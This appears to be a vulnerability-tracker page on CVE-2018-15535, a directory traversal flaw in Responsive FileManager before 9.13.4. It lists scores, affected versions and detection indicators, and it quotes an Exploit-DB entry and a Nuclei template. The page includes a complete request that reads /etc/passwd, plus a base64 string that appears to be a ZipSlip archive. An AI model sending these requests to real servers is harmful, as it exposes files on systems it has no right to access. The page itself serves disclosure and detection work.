CVE-2018-15535
published 2018-08-24CVE-2018-15535: /filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted…
PriorityP267high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
45.24%
98.6th percentile
/filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecrail | responsive_filemanager | < 9.13.4 | 9.13.4 |
Detection & IOCsextracted from sources · hover to see the quote
url/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd↗
bytes↗
UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAAAAAAAAAAAAAAtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYAAAAAAQABAFQAAABSAAAAAAA=
- →Look for GET requests to /filemanager/ajax_calls.php with parameters action=get_file&sub_action=preview&preview_mode=text and a 'file' parameter containing directory traversal sequences (e.g., ../../../../etc/passwd) ↗
- →Monitor POST requests to /filemanager/ajax_calls.php?action=extract with a body containing 'path=<archive_name>' — this triggers ZipSlip-style path traversal during archive extraction ↗
- →Detect HTTP responses to the traversal request that match the pattern 'root:.*:0:0:' in the body, indicating successful /etc/passwd disclosure ↗
- →Flag requests with X-Requested-With: XMLHttpRequest header targeting /filemanager/ajax_calls.php with traversal sequences ('..') in the 'file' query parameter ↗
- →Inspect uploaded ZIP archives for entries containing '../../' path components (ZipSlip), which can write files outside the intended upload directory ↗
- ·The traversal exploit requires no authentication (PR:N) and is network-accessible, meaning any unauthenticated user can trigger it if the filemanager endpoint is exposed ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Responsive FileManager < 9.13.4 - Directory Traversal
exploitdb·2018-08-27·CVSS 7.5
CVE-2018-15536 [HIGH] Responsive FileManager < 9.13.4 - Directory Traversal
Responsive FileManager < 9.13.4 - Directory Traversal
---
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com
#1 Path Traversal Allows to Read Any File
Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed
Details:
The following request allows a user to read any file on the system.
GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
X-Requested-With: XMLHttpRequest
Cookie: last_posit
Nuclei
Responsive FileManager <9.13.4 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-15535 [HIGH] Responsive FileManager <9.13.4 - Local File Inclusion
Responsive FileManager <9.13.4 - Local File Inclusion
Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
Template:
id: CVE-2018-15535
info:
name: Responsive FileManager <9.13.4 - Local File Inclusion
author: daffainfo
severity: high
description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unau
2018-08-24
Published